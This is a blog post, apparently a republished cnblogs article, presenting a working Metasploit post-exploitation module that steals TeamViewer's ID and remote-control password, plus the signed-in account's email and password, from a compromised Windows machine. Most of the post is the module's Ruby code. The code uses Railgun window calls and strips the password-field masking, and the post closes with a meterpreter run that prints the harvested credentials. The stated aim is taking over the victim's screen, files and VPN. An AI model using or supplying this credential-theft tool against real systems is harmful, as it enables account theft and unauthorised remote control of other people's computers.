• Get TeamViewer ID and Password


    Dump TeamViewer ID and Password

    Introduction

    Sometimes the target host has TeamViewer installed. In that situation the usual approach is to upload a compiled program that reads the ID and the control password, so that you can connect through TeamViewer and take over the target's screen, manage its files, connect to its VPN and so on.

    Metasploit has no module that reads TeamViewer's ID and control password. I decided to write one: the module reads the TeamViewer ID and control password and, if the login window is present, also reads the email address and login password.

    How it works

    First, the module uses Metasploit's Railgun feature to load the built-in Windows library User32.dll and call a few window functions. By enumerating window information it locates the handles of the edit boxes that hold the ID and the control password, then sends Windows messages to obtain the text inside those edit boxes.

    To obtain TeamViewer's main window handle I initially looked the window up by title with the FindWindow function, but the system language may differ from host to host. For compatibility I instead read the MainWindowHandle value from the registry key "HKEY_CURRENT_USER\Software\TeamViewer" and use that as the main window handle.

    The code that retrieves the ID and the control password:

    # EnumWindows does not work through Railgun: I don't know how to define the
    # lpEnumFunc callback parameter, so the window tree is walked with
    # FindWindowExW instead. hwnd_main is the MainWindowHandle registry value.
    def enum_id_and_password(hwnd_main)
      # Descend the TeamViewer window hierarchy by window class name:
      # main window -> MainWindowRemoteControlPage -> IncomingRemoteControlComponentView
      # -> two CustomRunner siblings (the first holds the ID box, the second the password box)
      hwnd_mwrcp = client.railgun.user32.FindWindowExW(hwnd_main, nil, 'MainWindowRemoteControlPage', nil)
      hwnd_irccv = client.railgun.user32.FindWindowExW(hwnd_mwrcp['return'], nil, 'IncomingRemoteControlComponentView', nil)
      hwnd_custom_runner_id = client.railgun.user32.FindWindowExW(hwnd_irccv['return'], nil, 'CustomRunner', nil)
      # Passing the first CustomRunner as hwndChildAfter yields the next sibling of that class
      hwnd_custom_runner_pass = client.railgun.user32.FindWindowExW(hwnd_irccv['return'], hwnd_custom_runner_id['return'], 'CustomRunner', nil)
      #  find the Edit control inside each container
      hwnd_id_edit_box = client.railgun.user32.FindWindowExW(hwnd_custom_runner_id['return'], nil, 'Edit', nil)
      print_status("Found handle to ID edit box #{hwnd_id_edit_box['return'].to_s(16).rjust(8, '0')}")
      hwnd_pass_edit_box = client.railgun.user32.FindWindowExW(hwnd_custom_runner_pass['return'], nil, 'Edit', nil)
      print_status("Found handle to Password edit box #{hwnd_pass_edit_box['return'].to_s(16).rjust(8, '0')}")
      #  get window text. Railgun returns 0 (NULL) for a window that was not found,
      #  and 0 is truthy in Ruby, so compare explicitly instead of relying on &&
      if hwnd_id_edit_box['return'] != 0 && hwnd_pass_edit_box['return'] != 0
        print_good("ID: #{get_window_text(hwnd_id_edit_box['return'])}")
        print_good("PASSWORD: #{get_window_text(hwnd_pass_edit_box['return'])}")
      else
        print_error('Handle for TeamViewer ID or password edit box not found')
      end
    end


    The code that retrieves the email address and the login password:

    def enum_email_and_password(hwnd_main)
      # main window -> LoginPage -> LoginFormView, which contains two Edit controls
      hwnd_lp = client.railgun.user32.FindWindowExW(hwnd_main, nil, 'LoginPage', nil)
      hwnd_lfv = client.railgun.user32.FindWindowExW(hwnd_lp['return'], nil, 'LoginFormView', nil)
      #  find edit box handles: the first Edit is the email box, the one after it the password box
      hwnd_email_edit_box = client.railgun.user32.FindWindowExW(hwnd_lfv['return'], nil, 'Edit', nil)
      print_status("Found handle to Email edit box #{hwnd_email_edit_box['return'].to_s(16).rjust(8, '0')}")
      hwnd_pass_edit_box = client.railgun.user32.FindWindowExW(hwnd_lfv['return'], hwnd_email_edit_box['return'], 'Edit', nil)
      print_status("Found handle to Password edit box #{hwnd_pass_edit_box['return'].to_s(16).rjust(8, '0')}")
      #  Clear the edit control's style word at index GWL_STYLE (-16) so that the
      #  ES_PASSWORD masking no longer applies; see
      #  https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongw
      #  https://docs.microsoft.com/en-us/windows/win32/controls/edit-control-styles
      client.railgun.user32.SetWindowWord(hwnd_pass_edit_box['return'], -16, 0)
      #  get window text (0 means the window was not found; 0 is truthy in Ruby)
      if hwnd_email_edit_box['return'] != 0 && hwnd_pass_edit_box['return'] != 0
        print_good("EMAIL: #{get_window_text(hwnd_email_edit_box['return'])}")
        print_good("PASSWORD: #{get_window_text(hwnd_pass_edit_box['return'])}")
      else
        print_error('Handle for TeamViewer Email or Password edit box not found')
      end
    end


    In Railgun, EnumChildWindows takes a parameter that has to be an implementation of the EnumChildProc callback, and Metasploit cannot supply one. Strictly speaking it is not impossible, just cumbersome: you would have to allocate a region of executable memory in the process and write the callback's machine code there before EnumChildWindows could call it. So I switched to FindWindowExW and walk the hierarchy one level at a time. Fortunately the window class names of TeamViewer's edit boxes do not change, which is what makes this approach workable.

    Once the edit box handle has been found, the next step is to read the text inside it. In C you would call GetWindowTextW, but that does not work from Metasploit: in Railgun this function's lpString parameter is an output buffer, and I have not yet found a way to call it.

    So I wrote a function that reads a window's text:

    def get_window_text(window_hwnd)
      # Railgun returns 0 (NULL) when the window was not found
      return nil if window_hwnd.nil? || window_hwnd == 0

      # Allocate a buffer in the target process. The placeholder string only sets the
      # initial contents; the allocation is page-granular, so the 1024-character
      # limit passed to WM_GETTEXT still fits inside it
      addr = session.railgun.util.alloc_and_write_wstring('Kali-Team')
      # Ask the edit control to copy up to 1024 characters of its text into the buffer
      client.railgun.user32.SendMessageW(window_hwnd, 'WM_GETTEXT', 1024, addr)
      text = session.railgun.util.read_wstring(addr)
      # Release the buffer again
      client.railgun.multi([
        ['kernel32', 'VirtualFree', [addr, 0, MEM_RELEASE]],
      ])
      if text == ''
        'The content of this edit box is empty'
      else
        text
      end
    end


    Using the module

    Once you have a meterpreter session, you can run the module directly:

    meterpreter > run post/windows/gather/credentials/teamviewer_id_pwd 
    
    [*] TeamViewer's language setting options are 'en'
    [*] TeamViewer's version is '15.3.2682 '
    [+] The PID of TeamViewer's process has been found to be  3188.
    [+] TeamViewer's  title is 'TeamViewer'
    [*] Found handle to ID edit box 00010596
    [*] Found handle to Password edit box 0001059c
    [+] ID: 1 561 912 659
    [+] PASSWORD: 718xuu
    [*] Found handle to Email edit box 0001054c
    [*] Found handle to Password edit box 00010554
    [+] EMAIL: kali-team@qq.com
    [+] PASSWORD: MyPassword.
    meterpreter > 
    

  • Original article: https://www.cnblogs.com/Kali-Team/p/12468066.html